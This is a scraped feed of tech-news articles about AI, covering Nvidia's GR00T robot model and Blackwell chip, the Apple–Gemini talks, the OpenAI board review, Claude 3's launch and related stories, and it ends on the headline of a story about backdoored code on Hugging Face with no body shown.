machine learning

nvidia-announces-“moonshot”-to-create-embodied-human-level-ai-in-robot-form

Nvidia announces “moonshot” to create embodied human-level AI in robot form

Here come the robots —

As companies race to pair AI with general-purpose humanoid robots, Nvidia’s GR00T emerges.

An illustration of a humanoid robot created by Nvidia.

Enlarge / An illustration of a humanoid robot created by Nvidia.

Nvidia

In sci-fi films, the rise of humanlike artificial intelligence often comes hand in hand with a physical platform, such as an android or robot. While the most advanced AI language models so far seem mostly like disembodied voices echoing from an anonymous data center, they might not remain that way for long. Some companies like Google, Figure, Microsoft, Tesla, Boston Dynamics, and others are working toward giving AI models a body. This is called “embodiment,” and AI chipmaker Nvidia wants to accelerate the process.

“Building foundation models for general humanoid robots is one of the most exciting problems to solve in AI today,” said Nvidia CEO Jensen Huang in a statement. Huang spent a portion of Nvidia’s annual GTC conference keynote on Monday going over Nvidia’s robotics efforts. “The next generation of robotics will likely be humanoid robotics,” Huang said. “We now have the necessary technology to imagine generalized human robotics.”

To that end, Nvidia announced Project GR00T, a general-purpose foundation model for humanoid robots. As a type of AI model itself, Nvidia hopes GR00T (which stands for “Generalist Robot 00 Technology” but sounds a lot like a famous Marvel character) will serve as an AI mind for robots, enabling them to learn skills and solve various tasks on the fly. In a tweet, Nvidia researcher Linxi “Jim” Fan called the project “our moonshot to solve embodied AGI in the physical world.”

AGI, or artificial general intelligence, is a poorly defined term that usually refers to hypothetical human-level AI (or beyond) that can learn any task a human could without specialized training. Given a capable enough humanoid body driven by AGI, one could imagine fully autonomous robotic assistants or workers. Of course, some experts think that true AGI is long way off, so it’s possible that Nvidia’s goal is more aspirational than realistic. But that’s also what makes Nvidia’s plan a moonshot.

NVIDIA Robotics: A Journey From AVs to Humanoids.

“The GR00T model will enable a robot to understand multimodal instructions, such as language, video, and demonstration, and perform a variety of useful tasks,” wrote Fan on X. “We are collaborating with many leading humanoid companies around the world, so that GR00T may transfer across embodiments and help the ecosystem thrive.” We reached out to Nvidia researchers, including Fan, for comment but did not hear back by press time.

Nvidia is designing GR00T to understand natural language and emulate human movements, potentially allowing robots to learn coordination, dexterity, and other skills necessary for navigating and interacting with the real world like a person. And as it turns out, Nvidia says that making robots shaped like humans might be the key to creating functional robot assistants.

The humanoid key

Robotics startup figure, an Nvidia partner, recently showed off its humanoid

Enlarge / Robotics startup figure, an Nvidia partner, recently showed off its humanoid “Figure 01” robot.

Figure

So far, we’ve seen plenty of robotics platforms that aren’t human-shaped, including robot vacuum cleaners, autonomous weed pullers, industrial units used in automobile manufacturing, and even research arms that can fold laundry. So why focus on imitating the human form? “In a way, human robotics is likely easier,” said Huang in his GTC keynote. “And the reason for that is because we have a lot more imitation training data that we can provide robots, because we are constructed in a very similar way.”

That means that researchers can feed samples of training data captured from human movement into AI models that control robot movement, teaching them how to better move and balance themselves. Also, humanoid robots are particularly convenient because they can fit anywhere a person can, and we’ve designed a world of physical objects and interfaces (such as tools, furniture, stairs, and appliances) to be used or manipulated by the human form.

Along with GR00T, Nvidia also debuted a new computer platform called Jetson Thor, based on NVIDIA’s Thor system-on-a-chip (SoC), as part of the new Blackwell GPU architecture, which it hopes will power this new generation of humanoid robots. The SoC reportedly includes a transformer engine capable of 800 teraflops of 8-bit floating point AI computation for running models like GR00T.

Nvidia announces “moonshot” to create embodied human-level AI in robot form Read More »

nvidia-unveils-blackwell-b200,-the-“world’s-most-powerful-chip”-designed-for-ai

Nvidia unveils Blackwell B200, the “world’s most powerful chip” designed for AI

There’s no knowing where we’re rowing —

208B transistor chip can reportedly reduce AI cost and energy consumption by up to 25x.

The GB200

Enlarge / The GB200 “superchip” covered with a fanciful blue explosion.

Nvidia / Benj Edwards

On Monday, Nvidia unveiled the Blackwell B200 tensor core chip—the company’s most powerful single-chip GPU, with 208 billion transistors—which Nvidia claims can reduce AI inference operating costs (such as running ChatGPT) and energy consumption by up to 25 times compared to the H100. The company also unveiled the GB200, a “superchip” that combines two B200 chips and a Grace CPU for even more performance.

The news came as part of Nvidia’s annual GTC conference, which is taking place this week at the San Jose Convention Center. Nvidia CEO Jensen Huang delivered the keynote Monday afternoon. “We need bigger GPUs,” Huang said during his keynote. The Blackwell platform will allow the training of trillion-parameter AI models that will make today’s generative AI models look rudimentary in comparison, he said. For reference, OpenAI’s GPT-3, launched in 2020, included 175 billion parameters. Parameter count is a rough indicator of AI model complexity.

Nvidia named the Blackwell architecture after David Harold Blackwell, a mathematician who specialized in game theory and statistics and was the first Black scholar inducted into the National Academy of Sciences. The platform introduces six technologies for accelerated computing, including a second-generation Transformer Engine, fifth-generation NVLink, RAS Engine, secure AI capabilities, and a decompression engine for accelerated database queries.

Press photo of the Grace Blackwell GB200 chip, which combines two B200 GPUs with a Grace CPU into one chip.

Enlarge / Press photo of the Grace Blackwell GB200 chip, which combines two B200 GPUs with a Grace CPU into one chip.

Several major organizations, such as Amazon Web Services, Dell Technologies, Google, Meta, Microsoft, OpenAI, Oracle, Tesla, and xAI, are expected to adopt the Blackwell platform, and Nvidia’s press release is replete with canned quotes from tech CEOs (key Nvidia customers) like Mark Zuckerberg and Sam Altman praising the platform.

GPUs, once only designed for gaming acceleration, are especially well suited for AI tasks because their massively parallel architecture accelerates the immense number of matrix multiplication tasks necessary to run today’s neural networks. With the dawn of new deep learning architectures in the 2010s, Nvidia found itself in an ideal position to capitalize on the AI revolution and began designing specialized GPUs just for the task of accelerating AI models.

Nvidia’s data center focus has made the company wildly rich and valuable, and these new chips continue the trend. Nvidia’s gaming GPU revenue ($2.9 billion in the last quarter) is dwarfed in comparison to data center revenue (at $18.4 billion), and that shows no signs of stopping.

A beast within a beast

Press photo of the Nvidia GB200 NVL72 data center computer system.

Enlarge / Press photo of the Nvidia GB200 NVL72 data center computer system.

The aforementioned Grace Blackwell GB200 chip arrives as a key part of the new NVIDIA GB200 NVL72, a multi-node, liquid-cooled data center computer system designed specifically for AI training and inference tasks. It combines 36 GB200s (that’s 72 B200 GPUs and 36 Grace CPUs total), interconnected by fifth-generation NVLink, which links chips together to multiply performance.

A specification chart for the Nvidia GB200 NVL72 system.

Enlarge / A specification chart for the Nvidia GB200 NVL72 system.

“The GB200 NVL72 provides up to a 30x performance increase compared to the same number of NVIDIA H100 Tensor Core GPUs for LLM inference workloads and reduces cost and energy consumption by up to 25x,” Nvidia said.

That kind of speed-up could potentially save money and time while running today’s AI models, but it will also allow for more complex AI models to be built. Generative AI models—like the kind that power Google Gemini and AI image generators—are famously computationally hungry. Shortages of compute power have widely been cited as holding back progress and research in the AI field, and the search for more compute has led to figures like OpenAI CEO Sam Altman trying to broker deals to create new chip foundries.

While Nvidia’s claims about the Blackwell platform’s capabilities are significant, it’s worth noting that its real-world performance and adoption of the technology remain to be seen as organizations begin to implement and utilize the platform themselves. Competitors like Intel and AMD are also looking to grab a piece of Nvidia’s AI pie.

Nvidia says that Blackwell-based products will be available from various partners starting later this year.

Nvidia unveils Blackwell B200, the “world’s most powerful chip” designed for AI Read More »

apple-may-hire-google-to-power-new-iphone-ai-features-using-gemini—report

Apple may hire Google to power new iPhone AI features using Gemini—report

Bake a cake as fast as you can —

With Apple’s own AI tech lagging behind, the firm looks for a fallback solution.

A Google

Benj Edwards

On Monday, Bloomberg reported that Apple is in talks to license Google’s Gemini model to power AI features like Siri in a future iPhone software update coming later in 2024, according to people familiar with the situation. Apple has also reportedly conducted similar talks with ChatGPT maker OpenAI.

The potential integration of Google Gemini into iOS 18 could bring a range of new cloud-based (off-device) AI-powered features to Apple’s smartphone, including image creation or essay writing based on simple prompts. However, the terms and branding of the agreement have not yet been finalized, and the implementation details remain unclear. The companies are unlikely to announce any deal until Apple’s annual Worldwide Developers Conference in June.

Gemini could also bring new capabilities to Apple’s widely criticized voice assistant, Siri, which trails newer AI assistants powered by large language models (LLMs) in understanding and responding to complex questions. Rumors of Apple’s own internal frustration with Siri—and potential remedies—have been kicking around for some time. In January, 9to5Mac revealed that Apple had been conducting tests with a beta version of iOS 17.4 that used OpenAI’s ChatGPT API to power Siri.

As we have previously reported, Apple has also been developing its own AI models, including a large language model codenamed Ajax and a basic chatbot called Apple GPT. However, the company’s LLM technology is said to lag behind that of its competitors, making a partnership with Google or another AI provider a more attractive option.

Google launched Gemini, a language-based AI assistant similar to ChatGPT, in December and has updated it several times since. Many industry experts consider the larger Gemini models to be roughly as capable as OpenAI’s GPT-4 Turbo, which powers the subscription versions of ChatGPT. Until just recently, with the emergence of Gemini Ultra and Claude 3, OpenAI’s top model held a fairly wide lead in perceived LLM capability.

The potential partnership between Apple and Google could significantly impact the AI industry, as Apple’s platform represents more than 2 billion active devices worldwide. If the agreement gets finalized, it would build upon the existing search partnership between the two companies, which has seen Google pay Apple billions of dollars annually to make its search engine the default option on iPhones and other Apple devices.

However, Bloomberg reports that the potential partnership between Apple and Google is likely to draw scrutiny from regulators, as the companies’ current search deal is already the subject of a lawsuit by the US Department of Justice. The European Union is also pressuring Apple to make it easier for consumers to change their default search engine away from Google.

With so much potential money on the line, selecting Google for Apple’s cloud AI job could potentially be a major loss for OpenAI in terms of bringing its technology widely into the mainstream—with a market representing billions of users. Even so, any deal with Google or OpenAI may be a temporary fix until Apple can get its own LLM-based AI technology up to speed.

Apple may hire Google to power new iPhone AI features using Gemini—report Read More »

raspberry-pi-powered-ai-bike-light-detects-cars,-alerts-bikers-to-bad-drivers

Raspberry Pi-powered AI bike light detects cars, alerts bikers to bad drivers

Group ride —

Data from multiple Copilot devices could be used for road safety improvements.

Copilot mounted to the rear of a road bike

Velo AI

Whether or not autonomous vehicles ever work out, the effort put into using small cameras and machine-learning algorithms to detect cars could pay off big for an unexpected group: cyclists.

Velo AI is a firm cofounded by Clark Haynes and Micol Marchetti-Bowick, both PhDs with backgrounds in robotics, movement prediction, and Uber’s (since sold-off) autonomous vehicle work. Copilot, which started as a “pandemic passion project” for Haynes, is essentially car-focused artificial intelligence and machine learning stuffed into a Raspberry Pi Compute Module 4 and boxed up in a bike-friendly size and shape.

A look into the computer vision of the Copilot.

While car-detecting devices exist for bikes, including the Garmin Varia, they’re largely radar-based. That means they can’t distinguish between vehicles of different sizes and only know that something is approaching you, not, for example, how much space it will allow when passing.

Copilot purports to do a lot more:

  • Identify cars, bikes, and pedestrians
  • Alert riders audibly about cars “Following,” “Approaching,” and “Overtaking”
  • Issue visual warning to drivers who are approaching too close or too fast
  • Send visual notifications and a simplified rear road view to an optional paired smartphone
  • Record 1080p video and tag “close calls” and “incidents” from your phone

At 330 grams, with five hours of optimal battery life (and USB-C recharging), it’s not for the aero-obsessed rider or super-long-distance rider. And at $400, it might not speak to the most casual and infrequent cyclist. But it’s an intriguing piece of kit, especially for those who already have, or considered, a Garmin or similar action camera for watching their back. What if a camera could do more than just show you the car after you’re already endangered by it?

Copilot's computer vision can alert riders to cars that are

Copilot’s computer vision can alert riders to cars that are “Following,” “Approaching,” and “Overtaking.”

Velo AI

The Velo team detailed some of their building process for the official Raspberry Pi blog. The Compute Module 4 powers the core system and lights, while a custom Hailo AI co-processor helps with the neural networks and computer vision. An Arducam camera provides the vision and recording.

Beyond individual safety, the Velo AI team hopes that data from Copilots can feed into larger-scale road safety improvements. The team told the Pi blog that they’re starting a partnership with Pittsburgh, seeding Copilots to regular bike commuters and analyzing the aggregate data for potential infrastructure upgrades.

The Copilot is available for sale now and shipping, according to Velo AI. A December 2023 pre-order sold out.

Raspberry Pi-powered AI bike light detects cars, alerts bikers to bad drivers Read More »

image-scraping-midjourney-bans-rival-ai-firm-for-scraping-images

Image-scraping Midjourney bans rival AI firm for scraping images

Irony lives —

Midjourney pins blame for 24-hour outage on “bot-net like” activity from Stability AI employee.

A burglar with flash light and papers in business office. Exactly like scraping files from Discord.

Enlarge / A burglar with a flashlight and papers in a business office—exactly like scraping files from Discord.

On Wednesday, Midjourney banned all employees from image synthesis rival Stability AI from its service indefinitely after it detected “botnet-like” activity suspected to be a Stability employee attempting to scrape prompt and image pairs in bulk. Midjourney advocate Nick St. Pierre tweeted about the announcement, which came via Midjourney’s official Discord channel.

Prompts are the written instructions (like “a cat in a car holding a can of a beer”) used by generative AI models such as Midjourney and Stability AI’s Stable Diffusion 3 (SD3) to synthesize images. Having prompt and image pairs could potentially help the training or fine-tuning of a rival AI image generator model.

Bot activity that took place around midnight on March 2 caused a 24-hour outage for the commercial image generator service. Midjourney linked several paid accounts with a Stability AI data team employee trying to “grab prompt and image pairs.” Midjourney then made a decision to ban all Stability AI employees from the service indefinitely. It also indicated a new policy: “aggressive automation or taking down the service results in banning all employees of the responsible company.”

A screenshot of the

Enlarge / A screenshot of the “Midjourney Office Hours” notes posted on March 6, 2024.

Midjourney

Siobhan Ball of The Mary Sue found it ironic that a company like Midjourney, which built its AI image synthesis models using training data scraped off the Internet without seeking permission, would be sensitive about having its own material scraped. “It turns out that generative AI companies don’t like it when you steal, sorry, scrape, images from them. Cue the world’s smallest violin.”

Users of Midjourney pay a monthly subscription fee to access an AI image generator that turns written prompts into lush computer-synthesized images. The bot that makes them was trained on millions of artistic works created by humans—it’s a practice that has been claimed to be disrespectful to artists. “Words can’t describe how dehumanizing it is to see my name used 20,000+ times in MidJourney,” wrote artist Jingna Zhang in a recent viral tweet. “My life’s work and who I am—reduced to meaningless fodder for a commercial image slot machine.”

Stability responds

Shortly after the news of the ban emerged, Stability AI CEO Emad Mostaque said that he was looking into it and claimed that whatever happened was not intentional. He also said it would be great if Midjourney reached out to him directly. In a reply on X, Midjourney CEO David Holz wrote, “sent you some information to help with your internal investigation.”

In a text message exchange with Ars Technica, Mostaque said, “We checked and there were no images scraped there, there was a bot run by a team member that was collecting prompts for a personal project though. We aren’t sure how that would cause a gallery site outage but are sorry if it did, Midjourney is great.”

Besides, Mostaque says, his company doesn’t need Midjourney’s data anyway. “We have been using synthetic & other data given SD3 outperforms all other models,” he wrote on X. In conversation with Ars, Mostaque similarly wanted to contrast his company’s data collection techniques with those of his rival. “We only scrape stuff that has proper robots.txt and is permissive,” Mostaque says. “And also did full opt-out for [Stable Diffusion 3] and Stable Cascade leveraging work Spawning did.”

When asked about Stability’s relationship with Midjourney these days, Mostaque played down the rivalry. “No real overlap, we get on fine though,” he told Ars and emphasized a key link in their histories. “I funded Midjourney to get [them] off the ground with a cash grant to cover [Nvidia] A100s for the beta.”

Image-scraping Midjourney bans rival AI firm for scraping images Read More »

openai-ceo-altman-wasn’t-fired-because-of-scary-new-tech,-just-internal-politics

OpenAI CEO Altman wasn’t fired because of scary new tech, just internal politics

Adventures in optics —

As Altman cements power, OpenAI announces three new board members—and a returning one.

OpenAI CEO Sam Altman speaks during the OpenAI DevDay event on November 6, 2023, in San Francisco.

Enlarge / OpenAI CEO Sam Altman speaks during the OpenAI DevDay event on November 6, 2023, in San Francisco.

On Friday afternoon Pacific Time, OpenAI announced the appointment of three new members to the company’s board of directors and released the results of an independent review of the events surrounding CEO Sam Altman’s surprise firing last November. The current board expressed its confidence in the leadership of Altman and President Greg Brockman, and Altman is rejoining the board.

The newly appointed board members are Dr. Sue Desmond-Hellmann, former CEO of the Bill and Melinda Gates Foundation; Nicole Seligman, former EVP and global general counsel of Sony; and Fidji Simo, CEO and chair of Instacart. These additions notably bring three women to the board after OpenAI met criticism about its restructured board composition last year. In addition, Sam Altman has rejoined the board.

The independent review, conducted by law firm WilmerHale, investigated the circumstances that led to Altman’s abrupt removal from the board and his termination as CEO on November 17, 2023. Despite rumors to the contrary, the board did not fire Altman because they got a peek at scary new AI technology and flinched. “WilmerHale… found that the prior Board’s decision did not arise out of concerns regarding product safety or security, the pace of development, OpenAI’s finances, or its statements to investors, customers, or business partners.”

Instead, the review determined that the prior board’s actions stemmed from a breakdown in trust between the board and Altman.

After reportedly interviewing dozens of people and reviewing over 30,000 documents, WilmerHale found that while the prior board acted within its purview, Altman’s termination was unwarranted. “WilmerHale found that the prior Board acted within its broad discretion to terminate Mr. Altman,” OpenAI wrote, “but also found that his conduct did not mandate removal.”

Additionally, the law firm found that the decision to fire Altman was made in undue haste: “The prior Board implemented its decision on an abridged timeframe, without advance notice to key stakeholders and without a full inquiry or an opportunity for Mr. Altman to address the prior Board’s concerns.”

Altman’s surprise firing occurred after he attempted to remove Helen Toner from OpenAI’s board due to disagreements over her criticism of OpenAI’s approach to AI safety and hype. Some board members saw his actions as deceptive and manipulative. After Altman returned to OpenAI, Toner resigned from the OpenAI board on November 29.

In a statement posted on X, Altman wrote, “i learned a lot from this experience. one think [sic] i’ll say now: when i believed a former board member was harming openai through some of their actions, i should have handled that situation with more grace and care. i apologize for this, and i wish i had done it differently.”

A tweet from Sam Altman posted on March 8, 2024.

Enlarge / A tweet from Sam Altman posted on March 8, 2024.

Following the review’s findings, the Special Committee of the OpenAI Board recommended endorsing the November 21 decision to rehire Altman and Brockman. The board also announced several enhancements to its governance structure, including new corporate governance guidelines, a strengthened Conflict of Interest Policy, a whistleblower hotline, and additional board committees focused on advancing OpenAI’s mission.

After OpenAI’s announcements on Friday, resigned OpenAI board members Toner and Tasha McCauley released a joint statement on X. “Accountability is important in any company, but it is paramount when building a technology as potentially world-changing as AGI,” they wrote. “We hope the new board does its job in governing OpenAI and holding it accountable to the mission. As we told the investigators, deception, manipulation, and resistance to thorough oversight should be unacceptable.”

OpenAI CEO Altman wasn’t fired because of scary new tech, just internal politics Read More »

matrix-multiplication-breakthrough-could-lead-to-faster,-more-efficient-ai-models

Matrix multiplication breakthrough could lead to faster, more efficient AI models

The Matrix Revolutions —

At the heart of AI, matrix math has just seen its biggest boost “in more than a decade.”

Futuristic huge technology tunnel and binary data.

Enlarge / When you do math on a computer, you fly through a numerical tunnel like this—figuratively, of course.

Computer scientists have discovered a new way to multiply large matrices faster than ever before by eliminating a previously unknown inefficiency, reports Quanta Magazine. This could eventually accelerate AI models like ChatGPT, which rely heavily on matrix multiplication to function. The findings, presented in two recent papers, have led to what is reported to be the biggest improvement in matrix multiplication efficiency in over a decade.

Multiplying two rectangular number arrays, known as matrix multiplication, plays a crucial role in today’s AI models, including speech and image recognition, chatbots from every major vendor, AI image generators, and video synthesis models like Sora. Beyond AI, matrix math is so important to modern computing (think image processing and data compression) that even slight gains in efficiency could lead to computational and power savings.

Graphics processing units (GPUs) excel in handling matrix multiplication tasks because of their ability to process many calculations at once. They break down large matrix problems into smaller segments and solve them concurrently using an algorithm.

Perfecting that algorithm has been the key to breakthroughs in matrix multiplication efficiency over the past century—even before computers entered the picture. In October 2022, we covered a new technique discovered by a Google DeepMind AI model called AlphaTensor, focusing on practical algorithmic improvements for specific matrix sizes, such as 4×4 matrices.

By contrast, the new research, conducted by Ran Duan and Renfei Zhou of Tsinghua University, Hongxun Wu of the University of California, Berkeley, and by Virginia Vassilevska Williams, Yinzhan Xu, and Zixuan Xu of the Massachusetts Institute of Technology (in a second paper), seeks theoretical enhancements by aiming to lower the complexity exponent, ω, for a broad efficiency gain across all sizes of matrices. Instead of finding immediate, practical solutions like AlphaTensor, the new technique addresses foundational improvements that could transform the efficiency of matrix multiplication on a more general scale.

Approaching the ideal value

The traditional method for multiplying two n-by-n matrices requires n³ separate multiplications. However, the new technique, which improves upon the “laser method” introduced by Volker Strassen in 1986, has reduced the upper bound of the exponent (denoted as the aforementioned ω), bringing it closer to the ideal value of 2, which represents the theoretical minimum number of operations needed.

The traditional way of multiplying two grids full of numbers could require doing the math up to 27 times for a grid that’s 3×3. But with these advancements, the process is accelerated by significantly reducing the multiplication steps required. The effort minimizes the operations to slightly over twice the size of one side of the grid squared, adjusted by a factor of 2.371552. This is a big deal because it nearly achieves the optimal efficiency of doubling the square’s dimensions, which is the fastest we could ever hope to do it.

Here’s a brief recap of events. In 2020, Josh Alman and Williams introduced a significant improvement in matrix multiplication efficiency by establishing a new upper bound for ω at approximately 2.3728596. In November 2023, Duan and Zhou revealed a method that addressed an inefficiency within the laser method, setting a new upper bound for ω at approximately 2.371866. The achievement marked the most substantial progress in the field since 2010. But just two months later, Williams and her team published a second paper that detailed optimizations that reduced the upper bound for ω to 2.371552.

The 2023 breakthrough stemmed from the discovery of a “hidden loss” in the laser method, where useful blocks of data were unintentionally discarded. In the context of matrix multiplication, “blocks” refer to smaller segments that a large matrix is divided into for easier processing, and “block labeling” is the technique of categorizing these segments to identify which ones to keep and which to discard, optimizing the multiplication process for speed and efficiency. By modifying the way the laser method labels blocks, the researchers were able to reduce waste and improve efficiency significantly.

While the reduction of the omega constant might appear minor at first glance—reducing the 2020 record value by 0.0013076—the cumulative work of Duan, Zhou, and Williams represents the most substantial progress in the field observed since 2010.

“This is a major technical breakthrough,” said William Kuszmaul, a theoretical computer scientist at Harvard University, as quoted by Quanta Magazine. “It is the biggest improvement in matrix multiplication we’ve seen in more than a decade.”

While further progress is expected, there are limitations to the current approach. Researchers believe that understanding the problem more deeply will lead to the development of even better algorithms. As Zhou stated in the Quanta report, “People are still in the very early stages of understanding this age-old problem.”

So what are the practical applications? For AI models, a reduction in computational steps for matrix math could translate into faster training times and more efficient execution of tasks. It could enable more complex models to be trained more quickly, potentially leading to advancements in AI capabilities and the development of more sophisticated AI applications. Additionally, efficiency improvement could make AI technologies more accessible by lowering the computational power and energy consumption required for these tasks. That would also reduce AI’s environmental impact.

The exact impact on the speed of AI models depends on the specific architecture of the AI system and how heavily its tasks rely on matrix multiplication. Advancements in algorithmic efficiency often need to be coupled with hardware optimizations to fully realize potential speed gains. But still, as improvements in algorithmic techniques add up over time, AI will get faster.

Matrix multiplication breakthrough could lead to faster, more efficient AI models Read More »

us-gov’t-announces-arrest-of-former-google-engineer-for-alleged-ai-trade-secret-theft

US gov’t announces arrest of former Google engineer for alleged AI trade secret theft

Don’t trade the secrets dept. —

Linwei Ding faces four counts of trade secret theft, each with a potential 10-year prison term.

A Google sign stands in front of the building on the sidelines of the opening of the new Google Cloud data center in Hesse, Hanau, opened in October 2023.

Enlarge / A Google sign stands in front of the building on the sidelines of the opening of the new Google Cloud data center in Hesse, Hanau, opened in October 2023.

On Wednesday, authorities arrested former Google software engineer Linwei Ding in Newark, California, on charges of stealing AI trade secrets from the company. The US Department of Justice alleges that Ding, a Chinese national, committed the theft while secretly working with two China-based companies.

According to the indictment, Ding, who was hired by Google in 2019 and had access to confidential information about the company’s data centers, began uploading hundreds of files into a personal Google Cloud account two years ago.

The trade secrets Ding allegedly copied contained “detailed information about the architecture and functionality of GPU and TPU chips and systems, the software that allows the chips to communicate and execute tasks, and the software that orchestrates thousands of chips into a supercomputer capable of executing at the cutting edge of machine learning and AI technology,” according to the indictment.

Shortly after the alleged theft began, Ding was offered the position of chief technology officer at an early-stage technology company in China that touted its use of AI technology. The company offered him a monthly salary of about $14,800, plus an annual bonus and company stock. Ding reportedly traveled to China, participated in investor meetings, and sought to raise capital for the company.

Investigators reviewed surveillance camera footage that showed another employee scanning Ding’s name badge at the entrance of the building where Ding worked at Google, making him look like he was working from his office when he was actually traveling.

Ding also founded and served as the chief executive of a separate China-based startup company that aspired to train “large AI models powered by supercomputing chips,” according to the indictment. Prosecutors say Ding did not disclose either affiliation to Google, which described him as a junior employee. He resigned from Google on December 26 of last year.

The FBI served a search warrant at Ding’s home in January, seizing his electronic devices and later executing an additional warrant for the contents of his personal accounts. Authorities found more than 500 unique files of confidential information that Ding allegedly stole from Google. The indictment says that Ding copied the files into the Apple Notes application on his Google-issued Apple MacBook, then converted the Apple Notes into PDF files and uploaded them to an external account to evade detection.

“We have strict safeguards to prevent the theft of our confidential commercial information and trade secrets,” Google spokesperson José Castañeda told Ars Technica. “After an investigation, we found that this employee stole numerous documents, and we quickly referred the case to law enforcement. We are grateful to the FBI for helping protect our information and will continue cooperating with them closely.”

Attorney General Merrick Garland announced the case against the 38-year-old at an American Bar Association conference in San Francisco. Ding faces four counts of federal trade secret theft, each carrying a potential sentence of up to 10 years in prison.

US gov’t announces arrest of former Google engineer for alleged AI trade secret theft Read More »

some-teachers-are-now-using-chatgpt-to-grade-papers

Some teachers are now using ChatGPT to grade papers

robots in disguise —

New AI tools aim to help with grading, lesson plans—but may have serious drawbacks.

An elementary-school-aged child touching a robot hand.

In a notable shift toward sanctioned use of AI in schools, some educators in grades 3–12 are now using a ChatGPT-powered grading tool called Writable, reports Axios. The tool, acquired last summer by Houghton Mifflin Harcourt, is designed to streamline the grading process, potentially offering time-saving benefits for teachers. But is it a good idea to outsource critical feedback to a machine?

Writable lets teachers submit student essays for analysis by ChatGPT, which then provides commentary and observations on the work. The AI-generated feedback goes to teacher review before being passed on to students so that a human remains in the loop.

“Make feedback more actionable with AI suggestions delivered to teachers as the writing happens,” Writable promises on its AI website. “Target specific areas for improvement with powerful, rubric-aligned comments, and save grading time with AI-generated draft scores.” The service also provides AI-written writing-prompt suggestions: “Input any topic and instantly receive unique prompts that engage students and are tailored to your classroom needs.”

Writable can reportedly help a teacher develop a curriculum, although we have not tried the functionality ourselves. “Once in Writable you can also use AI to create curriculum units based on any novel, generate essays, multi-section assignments, multiple-choice questions, and more, all with included answer keys,” the site claims.

The reliance on AI for grading will likely have drawbacks. Automated grading might encourage some educators to take shortcuts, diminishing the value of personalized feedback. Over time, the augmentation from AI may allow teachers to be less familiar with the material they are teaching. The use of cloud-based AI tools may have privacy implications for teachers and students. Also, ChatGPT isn’t a perfect analyst. It can get things wrong and potentially confabulate (make up) false information, possibly misinterpret a student’s work, or provide erroneous information in lesson plans.

Yet, as Axios reports, proponents assert that AI grading tools like Writable may free up valuable time for teachers, enabling them to focus on more creative and impactful teaching activities. The company selling Writable promotes it as a way to empower educators, supposedly offering them the flexibility to allocate more time to direct student interaction and personalized teaching. Of course, without an in-depth critical review, all claims should be taken with a huge grain of salt.

Amid these discussions, there’s a divide among parents regarding the use of AI in evaluating students’ academic performance. A recent poll of parents revealed mixed opinions, with nearly half of the respondents open to the idea of AI-assisted grading.

As the generative AI craze permeates every space, it’s no surprise that Writable isn’t the only AI-powered grading tool on the market. Others include Crowdmark, Gradescope, and EssayGrader. McGraw Hill is reportedly developing similar technology aimed at enhancing teacher assessment and feedback.

Some teachers are now using ChatGPT to grade papers Read More »

openai-clarifies-the-meaning-of-“open”-in-its-name,-responding-to-musk-lawsuit

OpenAI clarifies the meaning of “open” in its name, responding to Musk lawsuit

The OpenAI logo as an opening to a red brick wall.

Enlarge (credit: Benj Edwards / Getty Images)

On Tuesday, OpenAI published a blog post titled “OpenAI and Elon Musk” in response to a lawsuit Musk filed last week. The ChatGPT maker shared several archived emails from Musk that suggest he once supported a pivot away from open source practices in the company’s quest to develop artificial general intelligence (AGI). The selected emails also imply that the “open” in “OpenAI” means that the ultimate result of its research into AGI should be open to everyone but not necessarily “open source” along the way.

In one telling exchange from January 2016 shared by the company, OpenAI Chief Scientist Illya Sutskever wrote, “As we get closer to building AI, it will make sense to start being less open. The Open in openAI means that everyone should benefit from the fruits of AI after its built, but it’s totally OK to not share the science (even though sharing everything is definitely the right strategy in the short and possibly medium term for recruitment purposes).”

In response, Musk replied simply, “Yup.”

Read 8 remaining paragraphs | Comments

OpenAI clarifies the meaning of “open” in its name, responding to Musk lawsuit Read More »

the-ai-wars-heat-up-with-claude-3,-claimed-to-have-“near-human”-abilities

The AI wars heat up with Claude 3, claimed to have “near-human” abilities

The Anthropic Claude 3 logo.

Enlarge / The Anthropic Claude 3 logo.

On Monday, Anthropic released Claude 3, a family of three AI language models similar to those that power ChatGPT. Anthropic claims the models set new industry benchmarks across a range of cognitive tasks, even approaching “near-human” capability in some cases. It’s available now through Anthropic’s website, with the most powerful model being subscription-only. It’s also available via API for developers.

Claude 3’s three models represent increasing complexity and parameter count: Claude 3 Haiku, Claude 3 Sonnet, and Claude 3 Opus. Sonnet powers the Claude.ai chatbot now for free with an email sign-in. But as mentioned above, Opus is only available through Anthropic’s web chat interface if you pay $20 a month for “Claude Pro,” a subscription service offered through the Anthropic website. All three feature a 200,000-token context window. (The context window is the number of tokens—fragments of a word—that an AI language model can process at once.)

We covered the launch of Claude in March 2023 and Claude 2 in July that same year. Each time, Anthropic fell slightly behind OpenAI’s best models in capability while surpassing them in terms of context window length. With Claude 3, Anthropic has perhaps finally caught up with OpenAI’s released models in terms of performance, although there is no consensus among experts yet—and the presentation of AI benchmarks is notoriously prone to cherry-picking.

A Claude 3 benchmark chart provided by Anthropic.

Enlarge / A Claude 3 benchmark chart provided by Anthropic.

Claude 3 reportedly demonstrates advanced performance across various cognitive tasks, including reasoning, expert knowledge, mathematics, and language fluency. (Despite the lack of consensus over whether large language models “know” or “reason,” the AI research community commonly uses those terms.) The company claims that the Opus model, the most capable of the three, exhibits “near-human levels of comprehension and fluency on complex tasks.”

That’s quite a heady claim and deserves to be parsed more carefully. It’s probably true that Opus is “near-human” on some specific benchmarks, but that doesn’t mean that Opus is a general intelligence like a human (consider that pocket calculators are superhuman at math). So, it’s a purposely eye-catching claim that can be watered down with qualifications.

According to Anthropic, Claude 3 Opus beats GPT-4 on 10 AI benchmarks, including MMLU (undergraduate level knowledge), GSM8K (grade school math), HumanEval (coding), and the colorfully named HellaSwag (common knowledge). Several of the wins are very narrow, such as 86.8 percent for Opus vs. 86.4 percent on a five-shot trial of MMLU, and some gaps are big, such as 84.9 percent on HumanEval over GPT-4’s 67.0 percent. But what that might mean, exactly, to you as a customer is difficult to say.

“As always, LLM benchmarks should be treated with a little bit of suspicion,” says AI researcher Simon Willison, who spoke with Ars about Claude 3. “How well a model performs on benchmarks doesn’t tell you much about how the model ‘feels’ to use. But this is still a huge deal—no other model has beaten GPT-4 on a range of widely used benchmarks like this.”

The AI wars heat up with Claude 3, claimed to have “near-human” abilities Read More »

hugging-face,-the-github-of-ai,-hosted-code-that-backdoored-user-devices

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

